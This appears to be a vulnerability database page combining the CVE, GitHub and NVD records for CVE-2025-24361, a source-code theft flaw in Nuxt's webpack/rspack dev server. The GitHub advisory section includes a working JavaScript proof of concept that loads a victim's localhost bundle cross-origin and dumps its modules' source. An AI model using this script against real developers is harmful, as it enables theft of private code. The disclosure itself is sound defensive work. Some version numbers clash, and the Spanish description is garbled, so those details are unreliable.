CVE-2025-24361 (GCVE-0-2025-24361)
Vulnerability from cvelistv5 – Published: 2025-01-25 00:53 – Updated: 2025-02-12 20:41
VLAI?
Title
Opening a malicious website while running a Nuxt dev server could allow read-only access to code
Summary
Nuxt is an open-source web development framework for Vue.js. Source code may be stolen during dev when using version 3.0.0 through 3.15.12 of the webpack builder or version 3.12.2 through 3.152 of the rspack builder and a victim opens a malicious web site. Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject a malicious script in their site and run the script. By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code. Version 3.15.13 of Nuxt patches this issue.
Severity ?
5.3 (Medium)
CWE
- CWE-749 - Exposed Dangerous Method or Function
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-24361",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-27T14:13:25.340238Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-12T20:41:32.191Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "nuxt",
"vendor": "nuxt",
"versions": [
{
"status": "affected",
"version": "\u003e= 3.0.0, \u003c 3.15.3"
},
{
"status": "affected",
"version": "\u003e= 3.12.2, \u003c 3.15.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Nuxt is an open-source web development framework for Vue.js. Source code may be stolen during dev when using version 3.0.0 through 3.15.12 of the webpack builder or version 3.12.2 through 3.152 of the rspack builder and a victim opens a malicious web site. Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject a malicious script in their site and run the script. By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code. Version 3.15.13 of Nuxt patches this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-749",
"description": "CWE-749: Exposed Dangerous Method or Function",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-25T00:53:23.400Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99"
},
{
"name": "https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f"
}
],
"source": {
"advisory": "GHSA-4gf7-ff8x-hq99",
"discovery": "UNKNOWN"
},
"title": "Opening a malicious website while running a Nuxt dev server could allow read-only access to code"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-24361",
"datePublished": "2025-01-25T00:53:23.400Z",
"dateReserved": "2025-01-20T15:18:26.989Z",
"dateUpdated": "2025-02-12T20:41:32.191Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"vulnrichment": {
"containers": "{\"cna\": {\"title\": \"Opening a malicious website while running a Nuxt dev server could allow read-only access to code\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-749\", \"lang\": \"en\", \"description\": \"CWE-749: Exposed Dangerous Method or Function\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"NONE\", \"baseScore\": 5.3, \"baseSeverity\": \"MEDIUM\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"scope\": \"UNCHANGED\", \"userInteraction\": \"REQUIRED\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99\"}, {\"name\": \"https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f\"}], \"affected\": [{\"vendor\": \"nuxt\", \"product\": \"nuxt\", \"versions\": [{\"version\": \"\u003e= 3.0.0, \u003c 3.15.3\", \"status\": \"affected\"}, {\"version\": \"\u003e= 3.12.2, \u003c 3.15.3\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-01-25T00:53:23.400Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Nuxt is an open-source web development framework for Vue.js. Source code may be stolen during dev when using version 3.0.0 through 3.15.12 of the webpack builder or version 3.12.2 through 3.152 of the rspack builder and a victim opens a malicious web site. Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject a malicious script in their site and run the script. By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code. Version 3.15.13 of Nuxt patches this issue.\"}], \"source\": {\"advisory\": \"GHSA-4gf7-ff8x-hq99\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-24361\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-01-27T14:13:25.340238Z\"}}}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2025-02-12T20:36:44.164Z\"}, \"title\": \"CISA ADP Vulnrichment\"}]}",
"cveMetadata": "{\"cveId\": \"CVE-2025-24361\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2025-01-20T15:18:26.989Z\", \"datePublished\": \"2025-01-25T00:53:23.400Z\", \"dateUpdated\": \"2025-01-25T00:53:23.400Z\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GHSA-4GF7-FF8X-HQ99
Vulnerability from github – Published: 2025-01-27 11:31 – Updated: 2025-01-30 03:05
VLAI?
Summary
Opening a malicious website while running a Nuxt dev server could allow read-only access to code
Details
Summary
Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.
Details
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script.
By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.
PoC
- Create a nuxt project with webpack / rspack builder.
- Run
npm run dev - Open
http://localhost:3000 - Run the script below in a web site that has a different origin.
- You can see the source code output in the document and the devtools console.
const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
for (const page in window.webpackChunknuxt_app) {
const moduleList = window.webpackChunknuxt_app[page][1]
console.log(moduleList)
for (const key in moduleList) {
const p = document.createElement('p')
const title = document.createElement('strong')
title.textContent = key
const code = document.createElement('code')
code.textContent = moduleList[key].toString()
p.append(title, ':', document.createElement('br'), code)
document.body.appendChild(p)
}
}
})
document.head.appendChild(script)
It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the
sourcesContent field).
Impact
Users using webpack / rspack builder may get the source code stolen by malicious websites.
Severity ?
5.3 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@nuxt/webpack-builder"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.15.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@nuxt/rspack-builder"
},
"ranges": [
{
"events": [
{
"introduced": "3.12.2"
},
{
"fixed": "3.15.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-24361"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": true,
"github_reviewed_at": "2025-01-27T11:31:41Z",
"nvd_published_at": "2025-01-25T01:15:24Z",
"severity": "MODERATE"
},
"details": "### Summary\nSource code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.\n\n### Details\nBecause the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `\u003cscript src=\"http://localhost:3000/_nuxt/app.js\"\u003e` in their site and run the script.\nBy using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code.\n\n### PoC\n1. Create a nuxt project with webpack / rspack builder.\n1. Run `npm run dev`\n1. Open `http://localhost:3000`\n1. Run the script below in a web site that has a different origin.\n1. You can see the source code output in the document and the devtools console.\n\n```js\nconst script = document.createElement(\u0027script\u0027)\nscript.src = \u0027http://localhost:3000/_nuxt/app.js\u0027\nscript.addEventListener(\u0027load\u0027, () =\u003e {\n for (const page in window.webpackChunknuxt_app) {\n const moduleList = window.webpackChunknuxt_app[page][1]\n console.log(moduleList)\n\n for (const key in moduleList) {\n const p = document.createElement(\u0027p\u0027)\n const title = document.createElement(\u0027strong\u0027)\n title.textContent = key\n const code = document.createElement(\u0027code\u0027)\n code.textContent = moduleList[key].toString()\n p.append(title, \u0027:\u0027, document.createElement(\u0027br\u0027), code)\n document.body.appendChild(p)\n }\n }\n})\ndocument.head.appendChild(script)\n```\n\n\nIt contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the `sourcesContent` field).\n\n### Impact\nUsers using webpack / rspack builder may get the source code stolen by malicious websites.\n",
"id": "GHSA-4gf7-ff8x-hq99",
"modified": "2025-01-30T03:05:05Z",
"published": "2025-01-27T11:31:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24361"
},
{
"type": "WEB",
"url": "https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f"
},
{
"type": "PACKAGE",
"url": "https://github.com/nuxt/nuxt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Opening a malicious website while running a Nuxt dev server could allow read-only access to code"
}
FKIE_CVE-2025-24361
Vulnerability from fkie_nvd - Published: 2025-01-25 01:15 - Updated: 2025-01-25 01:15
Severity ?
Summary
Nuxt is an open-source web development framework for Vue.js. Source code may be stolen during dev when using version 3.0.0 through 3.15.12 of the webpack builder or version 3.12.2 through 3.152 of the rspack builder and a victim opens a malicious web site. Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject a malicious script in their site and run the script. By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code. Version 3.15.13 of Nuxt patches this issue.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Nuxt is an open-source web development framework for Vue.js. Source code may be stolen during dev when using version 3.0.0 through 3.15.12 of the webpack builder or version 3.12.2 through 3.152 of the rspack builder and a victim opens a malicious web site. Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject a malicious script in their site and run the script. By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code. Version 3.15.13 of Nuxt patches this issue."
},
{
"lang": "es",
"value": "Nuxt es un desarrollo web de c\u00f3digo abierto framework para Vue.js. El c\u00f3digo fuente puede ser robado durante el desarrollo cuando se usa la versi\u00f3n 3.0.0 a la 3.15.12 del generador webpack o la versi\u00f3n 3.12.2 a la 3.152 del generador rspack y una v\u00edctima abre un sitio web malicioso. Debido a que la solicitud de la etiqueta script bscriptript cl\u00e1sica no est\u00e1 sujeta a la pol\u00edtica del mismo origen, un atacante puede inyectar un script de scripts** en su sitio scriptn el script. Al usar `Function::toString` contra los valores en `window.webpackChunknuxt_app`, el atacante puede obtener el c\u00f3digo fuente. La versi\u00f3n 3.15.13 de Nuxt corrige este problema."
}
],
"id": "CVE-2025-24361",
"lastModified": "2025-01-25T01:15:24.193",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-01-25T01:15:24.193",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-749"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…